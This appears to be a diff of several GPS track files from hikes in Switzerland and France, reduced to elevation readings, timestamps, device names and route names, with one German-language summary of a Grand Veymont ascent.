+2015-10-25T16:10:46Z
+
+
+1517.44
+2015-10-25T16:12:24Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-06-08T16:51:59Z
+
+2014-06-08 17:51:53
+
+
+
+
+
+
+670.65
+2014-06-08T16:10:44Z
+
+
+661.22
+2014-06-08T16:13:28Z
+
+
+659.58
+2014-06-08T16:14:06Z
+
+
+660.41
+2014-06-08T16:14:39Z
+
+
+660.1
+2014-06-08T16:15:20Z
+
+
+659.27
+2014-06-08T16:15:43Z
+
+
+650.88
+2014-06-08T16:16:11Z
+
+
+621.83
+2014-06-08T16:17:27Z
+
+
+615.67
+2014-06-08T16:17:43Z
+
+
+615.61
+2014-06-08T16:18:23Z
+
+
+622.06
+2014-06-08T16:18:44Z
+
+
+628.17
+2014-06-08T16:19:05Z
+
+
+652.82
+2014-06-08T16:20:38Z
+
+
+660.03
+2014-06-08T16:22:12Z
+
+
+666.31
+2014-06-08T16:22:37Z
+
+
+670.58
+2014-06-08T16:22:58Z
+
+
+675.04
+2014-06-08T16:23:20Z
+
+
+694.77
+2014-06-08T16:24:30Z
+
+
+708.27
+2014-06-08T16:25:38Z
+
+
+726.37
+2014-06-08T16:26:42Z
+
+
+740.15
+2014-06-08T16:27:36Z
+
+
+752.8
+2014-06-08T16:28:24Z
+
+
+777.18
+2014-06-08T16:30:01Z
+
+
+793.25
+2014-06-08T16:30:59Z
+
+
+811.63
+2014-06-08T16:35:47Z
+
+
+818.78
+2014-06-08T16:37:26Z
+
+
+832.28
+2014-06-08T16:38:19Z
+
+
+871.36
+2014-06-08T16:40:30Z
+
+
+879.44
+2014-06-08T16:40:57Z
+
+
+888.68
+2014-06-08T16:41:30Z
+
+
+908.44
+2014-06-08T16:43:25Z
+
+
+925.52
+2014-06-08T16:44:20Z
+
+
+930.76
+2014-06-08T16:44:42Z
+
+
+954.4
+2014-06-08T16:46:06Z
+
+
+963.9
+2014-06-08T16:46:53Z
+
+
+976.72
+2014-06-08T16:47:40Z
+
+
+986.45
+2014-06-08T16:49:00Z
+
+
+997.96
+2014-06-08T16:50:09Z
+
+
+1002.16
+2014-06-08T16:50:33Z
+
+
+1014.21
+2014-06-08T16:51:40Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-07-04T17:54:52Z
+
+
+Gitschen 1: 03 JUL 2014 13:18
+
+
+
+
+
+
+1239.73
+2014-07-03T11:18:35Z
+
+
+1240.11
+2014-07-03T11:19:13Z
+
+
+1240.02
+2014-07-03T11:19:48Z
+
+
+1240.85
+2014-07-03T11:20:33Z
+
+
+1245.02
+2014-07-03T11:20:56Z
+
+
+1275.48
+2014-07-03T11:23:49Z
+
+
+1282.84
+2014-07-03T11:24:46Z
+
+
+1286.75
+2014-07-03T11:25:45Z
+
+
+1303.0
+2014-07-03T11:28:09Z
+
+
+1330.69
+2014-07-03T11:31:15Z
+
+
+1342.54
+2014-07-03T11:32:26Z
+
+
+1370.38
+2014-07-03T11:35:17Z
+
+
+1380.84
+2014-07-03T11:36:18Z
+
+
+1388.56
+2014-07-03T11:37:01Z
+
+
+1426.98
+2014-07-03T11:41:22Z
+
+
+1436.1
+2014-07-03T11:42:10Z
+
+
+1475.17
+2014-07-03T11:45:47Z
+
+
+1490.0
+2014-07-03T11:47:18Z
+
+
+1511.82
+2014-07-03T11:49:42Z
+
+
+1571.79
+2014-07-03T11:55:14Z
+
+
+1626.57
+2014-07-03T12:00:44Z
+
+
+1638.59
+2014-07-03T12:04:10Z
+
+
+1662.68
+2014-07-03T12:07:11Z
+
+
+1707.89
+2014-07-03T12:12:07Z
+
+
+1720.01
+2014-07-03T12:14:30Z
+
+
+1758.08
+2014-07-03T12:18:22Z
+
+
+1778.74
+2014-07-03T12:20:34Z
+
+
+1845.92
+2014-07-03T12:27:32Z
+
+
+1896.93
+2014-07-03T12:47:51Z
+
+
+1928.52
+2014-07-03T12:51:12Z
+
+
+1939.98
+2014-07-03T12:52:17Z
+
+
+1974.99
+2014-07-03T12:55:46Z
+
+
+1984.06
+2014-07-03T12:56:31Z
+
+
+1989.6
+2014-07-03T12:57:04Z
+
+
+2002.58
+2014-07-03T12:58:25Z
+
+
+2015.17
+2014-07-03T12:59:46Z
+
+
+2029.32
+2014-07-03T13:01:23Z
+
+
+2049.63
+2014-07-03T13:03:46Z
+
+
+2053.22
+2014-07-03T13:04:45Z
+
+
+2048.05
+2014-07-03T13:05:46Z
+
+
+2042.97
+2014-07-03T13:06:45Z
+
+
+2047.38
+2014-07-03T13:07:48Z
+
+
+2048.87
+2014-07-03T13:10:47Z
+
+
+2065.01
+2014-07-03T13:13:51Z
+
+
+2097.93
+2014-07-03T13:18:15Z
+
+
+2112.65
+2014-07-03T13:19:51Z
+
+
+2128.2
+2014-07-03T13:21:32Z
+
+
+2157.9
+2014-07-03T13:27:04Z
+
+
+2159.63
+2014-07-03T13:27:41Z
+
+
+2159.43
+2014-07-03T13:27:59Z
+
+
+2164.81
+2014-07-03T13:28:51Z
+
+
+2184.11
+2014-07-03T13:42:11Z
+
+
+2243.46
+2014-07-03T13:49:34Z
+
+
+2268.08
+2014-07-03T13:52:36Z
+
+
+2300.53
+2014-07-03T13:57:16Z
+
+
+2321.63
+2014-07-03T14:32:23Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Gtand Veymont 2341m
+
+
+
+
+
+OruxMaps
+2016-09-20T11:52:00Z
+
+
+Gtand Veymont 2341m
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Gtand Veymont 2341m</h2><br /><p>Startzeit: 09/20/2016 13:52</p><p>Zielzeit: 09/20/2016 16:01</p><p>Strecke: 4,6km (02:09)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,2km/h</p><p>Max. Geschwindigkeit: 6,4km/h</p><p>Minimale Höhe: 1241m</p><p>Maximale Höhe: 2329m</p><p>Steig-Geschw.: 508,2m/h</p><p>Sink-Geschw.: -393,1m/h</p><p>Aufstieg: 1088m</p><p>Abstieg: -5m</p><p>Steigzeit: 02:08</p><p>Sinkzeit: 00:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1241.19
+2016-09-20T11:52:01Z
+
+
+1254.07
+2016-09-20T11:55:01Z
+
+
+1277.04
+2016-09-20T11:58:17Z
+
+
+1310.05
+2016-09-20T12:02:32Z
+
+
+1351.42
+2016-09-20T12:06:50Z
+
+
+1390.55
+2016-09-20T12:11:09Z
+
+
+1464.99
+2016-09-20T12:19:29Z
+
+
+1470.55
+2016-09-20T12:20:11Z
+
+
+1490.05
+2016-09-20T12:22:34Z
+
+
+1507.98
+2016-09-20T12:23:59Z
+
+
+1533.05
+2016-09-20T12:26:26Z
+
+
+1550.8
+2016-09-20T12:28:36Z
+
+
+1571.55
+2016-09-20T12:30:59Z
+
+
+1612.82
+2016-09-20T12:35:53Z
+
+
+1621.53
+2016-09-20T12:37:07Z
+
+
+1631.78
+2016-09-20T12:37:58Z
+
+
+1667.42
+2016-09-20T12:40:23Z
+
+
+1686.54
+2016-09-20T12:41:31Z
+
+
+1691.65
+2016-09-20T12:42:31Z
+
+
+1709.04
+2016-09-20T12:43:32Z
+
+
+1722.95
+2016-09-20T12:45:03Z
+
+
+1738.84
+2016-09-20T12:47:23Z
+
+
+1768.98
+2016-09-20T12:50:35Z
+
+
+1808.6
+2016-09-20T12:52:30Z
+
+
+1803.03
+2016-09-20T12:53:21Z
+
+
+1833.01
+2016-09-20T12:54:20Z
+
+
+1846.43
+2016-09-20T12:55:10Z
+
+
+1855.04
+2016-09-20T12:55:35Z
+
+
+1851.55
+2016-09-20T12:55:59Z
+
+
+1876.59
+2016-09-20T12:57:29Z
+
+
+1905.52
+2016-09-20T12:59:00Z
+
+
+1895.58
+2016-09-20T12:59:27Z
+
+
+1908.42
+2016-09-20T13:00:24Z
+
+
+1929.93
+2016-09-20T13:01:39Z
+
+
+1931.05
+2016-09-20T13:04:39Z
+
+
+1936.9
+2016-09-20T13:05:11Z
+
+
+1958.06
+2016-09-20T13:06:54Z
+
+
+1975.55
+2016-09-20T13:08:44Z
+
+
+1996.5
+2016-09-20T13:20:19Z
+
+
+2002.99
+2016-09-20T13:22:14Z
+
+
+2083.02
+2016-09-20T13:29:54Z
+
+
+2097.15
+2016-09-20T13:32:07Z
+
+
+2105.51
+2016-09-20T13:33:44Z
+
+
+2158.05
+2016-09-20T13:40:19Z
+
+
+2165.17
+2016-09-20T13:41:05Z
+
+
+2178.42
+2016-09-20T13:43:03Z
+
+
+2218.92
+2016-09-20T13:47:34Z
+
+
+2230.05
+2016-09-20T13:48:50Z
+
+
+2266.55
+2016-09-20T13:53:46Z
+
+
+2329.54
+2016-09-20T14:01:45Z
+ "
+"
+
+
+bern-belp
+
+
+
+
+
+
+
+
+
+540.0
+
+
+540.5999999999989
+
+
+542.1000001393312
+
+
+542.2999988972967
+
+
+541.9999958392749
+
+
+539.4999997357381
+
+
+539.9631505539752
+
+
+531.7999884263642
+
+
+521.8541040175029
+
+
+506.4
+
+
+503.9
+
+
+502.20000177504
+
+
+503.9000007447434
+
+
+503.4568402926181
+
+
+503.7
+
+
+503.71419563743353
+
+
+503.99999770714237
+
+
+504.4
+
+
+504.0948645487043
+
+
+504.1999988419998
+
+
+503.8999985069626
+
+
+504.29999837331434
+
+
+504.40000039098175
+
+
+504.5999995241793
+
+
+504.69999834004574
+
+
+505.30000266900475
+
+
+506.09999783025296
+
+
+504.79173907829244
+
+
+505.7
+
+
+507.30000005506326
+
+
+507.7
+
+
+507.671274162645
+
+
+507.8000037100511
+
+
+508.1000030326491
+
+
+509.0
+
+
+509.1999998852821
+
+
+509.0000028770294
+
+
+508.8999994279452
+
+
+509.49999222253916
+
+
+509.4999995674706
+
+
+509.4
+
+
+510.4
+
+
+510.06565411045005
+
+
+508.57121503482136
+
+
+509.5000011449187
+
+
+509.7
+
+
+509.66129555359
+
+
+510.80000475112126
+
+
+512.4
+
+
+511.19999402949054
+
+
+512.4000150168436
+
+
+512.9
+
+
+512.4000150169289
+
+
+509.9
+
+
+510.7000032824595
+
+
+510.99999963292146
+
+
+510.4999999664209
+
+
+510.2
+
+
+510.39999938573914
+
+
+510.30000028694644
+
+
+510.59999808544046
+
+
+509.97306887694793
+
+
+511.1000016650007
+
+
+511.3
+
+
+511.0
+
+
+510.5000000000002
+
+
+510.40000000000003
+ "
+"
+
+
+
+
+
+
+
+
+
+
+580.599975585938
+2014-04-24T06:08:28Z
+
+
+580.200012207031
+2014-04-24T06:09:24Z
+
+
+580.200012207031
+2014-04-24T06:09:55Z
+
+
+580.599975585938
+2014-04-24T06:10:33Z
+
+
+594.599975585938
+2014-04-24T06:11:59Z
+
+
+610.400024414062
+2014-04-24T06:13:23Z
+
+
+611.799987792969
+2014-04-24T06:14:19Z
+
+
+652.400024414062
+2014-04-24T06:17:48Z
+
+
+665.200012207031
+2014-04-24T06:19:13Z
+
+
+669.799987792969
+2014-04-24T06:19:54Z
+
+
+681.599975585938
+2014-04-24T06:21:06Z
+
+
+693.400024414062
+2014-04-24T06:22:25Z
+
+
+695.0
+2014-04-24T06:22:41Z
+
+
+706.0
+2014-04-24T06:23:39Z
+
+
+714.599975585938
+2014-04-24T06:24:41Z
+
+
+723.200012207031
+2014-04-24T06:25:38Z
+
+
+731.599975585938
+2014-04-24T06:26:31Z
+
+
+742.400024414062
+2014-04-24T06:27:46Z
+
+
+749.799987792969
+2014-04-24T06:28:21Z
+
+
+765.599975585938
+2014-04-24T06:29:46Z
+
+
+775.200012207031
+2014-04-24T06:30:50Z
+
+
+780.400024414062
+2014-04-24T06:31:37Z
+
+
+794.799987792969
+2014-04-24T06:34:18Z
+
+
+803.200012207031
+2014-04-24T06:35:17Z
+
+
+811.799987792969
+2014-04-24T06:36:21Z
+
+
+844.400024414062
+2014-04-24T06:39:22Z
+
+
+846.799987792969
+2014-04-24T06:40:12Z
+
+
+856.799987792969
+2014-04-24T06:42:15Z
+
+
+857.599975585938
+2014-04-24T06:42:37Z
+
+
+865.0
+2014-04-24T06:44:08Z
+
+
+869.200012207031
+2014-04-24T06:44:50Z
+
+
+871.200012207031
+2014-04-24T06:45:22Z
+
+
+884.0
+2014-04-24T06:47:42Z
+
+
+886.799987792969
+2014-04-24T06:48:16Z
+
+
+891.799987792969
+2014-04-24T06:49:24Z
+
+
+899.200012207031
+2014-04-24T06:50:41Z
+
+
+901.200012207031
+2014-04-24T06:51:05Z
+
+
+909.0
+2014-04-24T06:52:38Z
+
+
+920.599975585938
+2014-04-24T06:54:10Z
+
+
+925.200012207031
+2014-04-24T06:55:00Z
+
+
+932.0
+2014-04-24T06:56:11Z
+
+
+938.400024414062
+2014-04-24T06:57:31Z
+
+
+948.799987792969
+2014-04-24T06:58:49Z
+
+
+963.400024414062
+2014-04-24T07:00:46Z
+
+
+969.599975585938
+2014-04-24T07:01:46Z
+
+
+974.0
+2014-04-24T07:02:27Z
+
+
+978.400024414062
+2014-04-24T07:02:53Z
+
+
+1031.19995117188
+2014-04-24T07:04:00Z
+
+
+1177.0
+2014-04-24T07:05:19Z
+
+
+1181.59997558594
+2014-04-24T07:06:11Z
+
+
+1192.19995117188
+2014-04-24T07:07:12Z
+
+
+1209.80004882812
+2014-04-24T07:09:06Z
+
+
+1222.80004882812
+2014-04-24T07:11:03Z
+
+
+1223.80004882812
+2014-04-24T07:16:29Z
+
+
+1251.80004882812
+2014-04-24T07:19:26Z
+
+
+1286.0
+2014-04-24T07:23:09Z
+
+
+1318.59997558594
+2014-04-24T07:26:55Z
+
+
+1345.40002441406
+2014-04-24T07:29:34Z
+
+
+1389.19995117188
+2014-04-24T07:36:58Z
+
+
+1404.19995117188
+2014-04-24T07:40:02Z
+
+
+1413.0
+2014-04-24T07:43:08Z
+
+
+1423.59997558594
+2014-04-24T07:45:34Z
+ "
+"
+
+
+
+
+
+
+
+Bernina Ospizio - Alp Grüm
+
+
+
+2255.39
+
+
+2254.91
+
+
+2264.04
+
+
+2264.52
+
+
+2262.12
+
+
+2263.56
+
+
+2265.48
+
+
+2258.75
+
+
+2243.85
+
+
+2239.05
+
+
+2237.61
+
+
+2237.61
+
+
+2239.53
+
+
+2241.93
+
+
+2240.01
+
+
+2236.64
+
+
+2237.13
+
+
+2237.61
+
+
+2238.09
+
+
+2237.61
+
+
+2237.13
+
+
+2237.13
+
+
+2237.61
+
+
+2238.57
+
+
+2242.41
+
+
+2251.06
+
+
+2252.51
+
+
+2240.97
+
+
+2224.15
+
+
+2221.74
+
+
+2224.15
+
+
+2227.03
+
+
+2228.95
+
+
+2225.11
+
+
+2213.09
+
+
+2196.75
+
+
+2182.81
+
+
+2180.41
+
+
+2175.6
+
+
+2161.18
+
+
+2153.97
+
+
+2143.4
+
+
+2143.4
+
+
+2150.61
+
+
+2152.53
+
+
+2152.53
+
+
+2151.09
+
+
+2151.57
+
+
+2133.78
+
+
+2116.48
+
+
+2105.42
+
+
+2094.37
+
+
+2094.37
+ "
+"
+
+
+
+
+
+
+
+2016-01-07T12:52:21Z
+
+
+
+1644.953125
+2016-01-07T12:52:29Z
+
+
+1646.3952637
+2016-01-07T12:54:11Z
+
+
+1647.8371582
+2016-01-07T12:55:02Z
+
+
+1645.4338379
+2016-01-07T12:55:41Z
+
+
+1646.8757324
+2016-01-07T12:56:15Z
+
+
+1648.317627
+2016-01-07T12:57:19Z
+
+
+1646.8757324
+2016-01-07T12:57:36Z
+
+
+1646.8757324
+2016-01-07T12:58:06Z
+
+
+1648.7983398
+2016-01-07T13:00:57Z
+
+
+1650.7209473
+2016-01-07T13:01:55Z
+
+
+1657.4501953
+2016-01-07T13:03:04Z
+
+
+1656.0080566
+2016-01-07T13:04:37Z
+
+
+1656.0080566
+2016-01-07T13:07:59Z
+
+
+1656.4887695
+2016-01-07T13:09:55Z
+
+
+1657.9309082
+2016-01-07T13:12:22Z
+
+
+1646.3952637
+2016-01-07T13:15:09Z
+
+
+1683.4057617
+2016-01-07T13:20:16Z
+
+
+
+1683.4057617
+2016-01-07T13:20:16Z
+
+
+1668.5053711
+2016-01-07T13:25:33Z
+
+
+1701.6708984
+2016-01-07T13:28:35Z
+
+
+1701.6708984
+2016-01-07T13:28:59Z
+
+
+1690.6154785
+2016-01-07T13:35:00Z
+
+
+1698.7868652
+2016-01-07T13:36:46Z
+
+
+1684.8479004
+2016-01-07T13:39:57Z
+
+
+1683.4057617
+2016-01-07T13:41:19Z
+
+
+1673.3120117
+2016-01-07T13:43:34Z
+
+
+1650.2404785
+2016-01-07T13:45:40Z
+
+
+1656.9694824
+2016-01-07T13:46:31Z
+
+
+1652.1628418
+2016-01-07T13:49:25Z
+
+
+1650.2404785
+2016-01-07T13:50:20Z
+
+
+1647.3564453
+2016-01-07T13:50:55Z
+
+
+1649.7597656
+2016-01-07T13:51:26Z
+
+
+1656.0080566
+2016-01-07T13:52:25Z
+
+
+1658.8920898
+2016-01-07T13:54:29Z
+
+
+1650.7209473
+2016-01-07T13:57:10Z
+
+
+1655.5275879
+2016-01-07T14:00:31Z
+
+
+1651.2016602
+2016-01-07T14:01:56Z
+
+
+1641.5883789
+2016-01-07T14:04:35Z
+
+
+1646.3952637
+2016-01-07T14:06:07Z
+
+
+1649.2790527
+2016-01-07T14:09:15Z
+
+
+1648.317627
+2016-01-07T14:12:59Z
+
+
+1646.8757324
+2016-01-07T14:13:52Z
+
+
+1645.4338379
+2016-01-07T14:16:14Z
+
+
+1646.3952637
+2016-01-07T14:16:45Z
+
+
+1657.9309082
+2016-01-07T14:18:29Z
+
+
+1653.6049805
+2016-01-07T14:18:49Z
+
+
+1653.6049805
+2016-01-07T14:19:13Z
+
+
+1659.8532715
+2016-01-07T14:20:25Z
+
+
+1670.9086914
+2016-01-07T14:21:00Z
+
+
+1660.8149414
+2016-01-07T14:24:05Z
+
+
+1650.2404785
+2016-01-07T14:25:05Z
+
+
+1644.953125
+2016-01-07T14:26:35Z
+
+
+1649.2790527
+2016-01-07T14:28:23Z
+
+
+1651.682373
+2016-01-07T14:29:02Z
+
+
+1653.6049805
+2016-01-07T14:32:00Z
+
+
+1647.3564453
+2016-01-07T14:32:40Z
+
+
+1649.7597656
+2016-01-07T14:34:23Z
+
+
+1645.4338379
+2016-01-07T14:36:31Z
+
+
+1646.8757324
+2016-01-07T14:37:34Z
+
+
+1648.7983398
+2016-01-07T14:38:01Z
+
+
+1651.2016602
+2016-01-07T14:38:55Z
+
+
+1643.9916992
+2016-01-07T14:39:28Z
+
+
+1647.8371582
+2016-01-07T14:41:18Z
+
+
+1648.7983398
+2016-01-07T14:41:41Z
+
+
+1643.9916992
+2016-01-07T14:43:56Z
+
+
+1648.7983398
+2016-01-07T14:44:44Z
+
+
+1647.3564453
+2016-01-07T14:46:59Z
+
+
+1641.5883789
+2016-01-07T14:48:15Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-21T10:30:39Z
+
+2015-07-21 12:30:38
+
+
+
+
+
+
+2018.41
+2015-07-21T06:46:41Z
+
+
+2017.05
+2015-07-21T06:47:30Z
+
+
+2045.26
+2015-07-21T06:50:51Z
+
+
+2063.4
+2015-07-21T06:55:12Z
+
+
+2072.05
+2015-07-21T06:55:58Z
+
+
+2070.51
+2015-07-21T06:59:10Z
+
+
+2063.29
+2015-07-21T06:59:55Z
+
+
+2042.64
+2015-07-21T07:02:52Z
+
+
+2013.84
+2015-07-21T07:07:13Z
+
+
+2053.25
+2015-07-21T07:17:27Z
+
+
+2062.0
+2015-07-21T07:18:45Z
+
+
+2072.21
+2015-07-21T07:20:17Z
+
+
+2078.61
+2015-07-21T07:20:58Z
+
+
+2083.75
+2015-07-21T07:22:17Z
+
+
+2091.93
+2015-07-21T07:23:11Z
+
+
+2107.62
+2015-07-21T07:25:43Z
+
+
+2111.93
+2015-07-21T07:30:17Z
+
+
+2132.65
+2015-07-21T07:32:31Z
+
+
+2144.54
+2015-07-21T07:33:51Z
+
+
+2169.75
+2015-07-21T07:36:50Z
+
+
+2185.0
+2015-07-21T07:39:11Z
+
+
+2196.95
+2015-07-21T07:40:23Z
+
+
+2207.75
+2015-07-21T07:41:25Z
+
+
+2215.25
+2015-07-21T07:45:21Z
+
+
+2217.31
+2015-07-21T07:55:14Z
+
+
+2204.29
+2015-07-21T07:56:30Z
+
+
+2190.42
+2015-07-21T07:57:26Z
+
+
+2184.33
+2015-07-21T07:58:10Z
+
+
+2176.4
+2015-07-21T07:59:08Z
+
+
+2153.03
+2015-07-21T08:01:35Z
+
+
+2147.69
+2015-07-21T08:02:58Z
+
+
+2135.86
+2015-07-21T08:03:50Z
+
+
+2161.55
+2015-07-21T08:11:53Z
+
+
+2152.41
+2015-07-21T08:18:50Z
+
+
+2159.94
+2015-07-21T08:24:41Z
+
+
+2188.9
+2015-07-21T08:29:03Z
+
+
+2188.4
+2015-07-21T08:33:35Z
+
+
+2193.91
+2015-07-21T08:34:51Z
+
+
+2193.54
+2015-07-21T08:48:20Z
+
+
+2168.48
+2015-07-21T08:53:49Z
+
+
+2160.13
+2015-07-21T08:55:34Z
+
+
+2158.63
+2015-07-21T08:59:36Z
+
+
+2164.61
+2015-07-21T09:06:56Z
+
+
+2136.42
+2015-07-21T09:16:44Z
+
+
+2158.91
+2015-07-21T09:19:54Z
+
+
+2165.64
+2015-07-21T09:21:33Z
+
+
+2177.49
+2015-07-21T09:22:54Z
+
+
+2178.36
+2015-07-21T09:24:06Z
+
+
+2187.97
+2015-07-21T09:25:42Z
+
+
+2201.98
+2015-07-21T09:27:03Z
+
+
+2214.58
+2015-07-21T09:28:28Z
+
+
+2216.51
+2015-07-21T09:29:36Z
+
+
+2221.44
+2015-07-21T09:47:19Z
+
+
+2217.55
+2015-07-21T09:48:24Z
+
+
+2181.69
+2015-07-21T09:52:30Z
+
+
+2152.6
+2015-07-21T09:56:51Z
+
+
+2135.24
+2015-07-21T09:58:38Z
+
+
+2115.16
+2015-07-21T10:03:24Z
+
+
+2078.9
+2015-07-21T10:09:05Z
+
+
+2066.21
+2015-07-21T10:10:19Z
+
+
+2057.85
+2015-07-21T10:11:25Z
+
+
+2053.83
+2015-07-21T10:11:45Z
+
+
+2027.15
+2015-07-21T10:13:56Z
+
+
+2003.97
+2015-07-21T10:16:53Z
+
+
+1998.34
+2015-07-21T10:20:25Z
+
+
+1997.17
+2015-07-21T10:21:38Z
+
+
+1999.0
+2015-07-21T10:22:31Z
+
+
+2003.94
+2015-07-21T10:24:55Z
+
+
+2006.24
+2015-07-21T10:25:51Z
+
+
+2007.6
+2015-07-21T10:27:05Z
+
+
+2009.3
+2015-07-21T10:27:37Z
+
+
+2009.7
+2015-07-21T10:28:28Z
+
+
+2012.34
+2015-07-21T10:29:50Z
+
+
+2012.21
+2015-07-21T10:30:35Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-12T14:03:29Z
+
+
+Track 024
+
+
+
+
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+
+
+2015-03-12T15:51:16Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+oberdorf - chänzeli
+
+
+
+
+
+
+oberdorf - chänzeli
+
+
+
+677.1
+
+
+690.9
+
+
+696.7776636540821
+
+
+701.6000305770311
+
+
+716.9999732347839
+
+
+738.400071245844
+
+
+757.80001816337
+
+
+768.8000961484441
+
+
+812.9000361680814
+
+
+844.6
+
+
+854.3000012068463
+
+
+862.5998772037857
+
+
+872.6999770231893
+
+
+908.1998962628152
+
+
+1006.7999251606584
+
+
+1026.3001339289985
+
+
+1051.299992766893
+
+
+1053.9999658685513
+
+
+1052.7999863208722
+
+
+1049.9
+
+
+1073.3999865444541
+
+
+1131.4999935999283
+
+
+1154.599985513365
+
+
+1213.7999218052316
+
+
+1239.0114875823474
+
+
+1247.299919458954
+
+
+1251.799976033047
+
+
+1264.1999918516058
+
+
+1268.5707177862166
+
+
+1266.9000016826292
+
+
+1251.7000022947439
+
+
+1251.8448899204795
+
+
+1251.8625526648505
+
+
+1251.899986581288
+
+
+1249.9999754412095
+
+
+1227.1
+
+
+1197.3000499264044
+
+
+1163.999936103601
+
+
+1126.760194860222
+
+
+1078.3838787040147
+
+
+1075.0
+
+
+1052.7999863208722
+
+
+1014.4999793297902
+
+
+944.3
+
+
+872.6999770226315
+
+
+862.5998772028066
+
+
+854.3000012059349
+
+
+844.6
+
+
+812.9000361678721
+
+
+768.800096147964
+
+
+757.8000181624237
+
+
+738.4000712450057
+
+
+716.9999732347839
+
+
+701.6000305770311
+
+
+696.7776636540821
+
+
+690.9
+
+
+676.9
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+FInish
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-22T15:51:15Z
+
+
+2015-04-22 14:06:51
+
+
+
+
+
+
+1243.12
+2015-04-22T11:27:59Z
+
+
+1242.64
+2015-04-22T11:35:16Z
+
+
+1243.6
+2015-04-22T11:35:59Z
+
+
+1246.49
+2015-04-22T11:36:59Z
+
+
+1241.2
+2015-04-22T11:37:55Z
+
+
+1234.47
+2015-04-22T11:38:14Z
+
+
+1231.11
+2015-04-22T11:38:31Z
+
+
+1221.49
+2015-04-22T11:38:51Z
+
+
+1202.75
+2015-04-22T11:39:40Z
+
+
+1188.81
+2015-04-22T11:40:11Z
+
+
+1183.52
+2015-04-22T11:40:30Z
+
+
+1175.83
+2015-04-22T11:40:56Z
+
+
+1148.91
+2015-04-22T11:41:46Z
+
+
+1135.94
+2015-04-22T11:42:20Z
+
+
+1136.42
+2015-04-22T11:43:04Z
+
+
+1122.0
+2015-04-22T11:44:13Z
+
+
+1114.79
+2015-04-22T11:44:44Z
+
+
+1100.85
+2015-04-22T11:45:41Z
+
+
+1088.83
+2015-04-22T11:46:06Z
+
+
+1083.06
+2015-04-22T11:47:15Z
+
+
+1072.49
+2015-04-22T11:47:35Z
+
+
+1065.28
+2015-04-22T11:48:02Z
+
+
+1064.8
+2015-04-22T11:48:15Z
+
+
+1065.28
+2015-04-22T11:48:52Z
+
+
+1064.8
+2015-04-22T11:49:33Z
+
+
+1046.53
+2015-04-22T11:50:36Z
+
+
+1040.28
+2015-04-22T11:50:50Z
+
+
+1027.79
+2015-04-22T11:51:36Z
+
+
+1009.04
+2015-04-22T11:52:17Z
+
+
+1002.79
+2015-04-22T11:52:30Z
+
+
+993.18
+2015-04-22T11:52:58Z
+
+
+985.97
+2015-04-22T11:53:16Z
+
+
+976.84
+2015-04-22T11:53:41Z
+
+
+957.61
+2015-04-22T11:54:23Z
+
+
+946.56
+2015-04-22T11:54:51Z
+
+
+934.06
+2015-04-22T11:55:18Z
+
+
+932.14
+2015-04-22T11:55:23Z
+
+
+917.72
+2015-04-22T11:55:51Z
+
+
+908.58
+2015-04-22T11:56:15Z
+
+
+892.72
+2015-04-22T11:56:50Z
+
+
+879.26
+2015-04-22T11:57:23Z
+
+
+867.73
+2015-04-22T11:57:48Z
+
+
+858.59
+2015-04-22T11:58:58Z
+
+
+855.71
+2015-04-22T11:59:32Z
+
+
+851.87
+2015-04-22T11:59:53Z
+
+
+851.87
+2015-04-22T12:00:07Z
+
+
+848.98
+2015-04-22T12:00:44Z
+
+
+844.66
+2015-04-22T12:01:08Z
+
+
+839.37
+2015-04-22T12:01:27Z
+
+
+833.12
+2015-04-22T12:01:52Z
+
+
+831.68
+2015-04-22T12:02:03Z
+
+
+829.27
+2015-04-22T12:02:18Z
+
+
+825.91
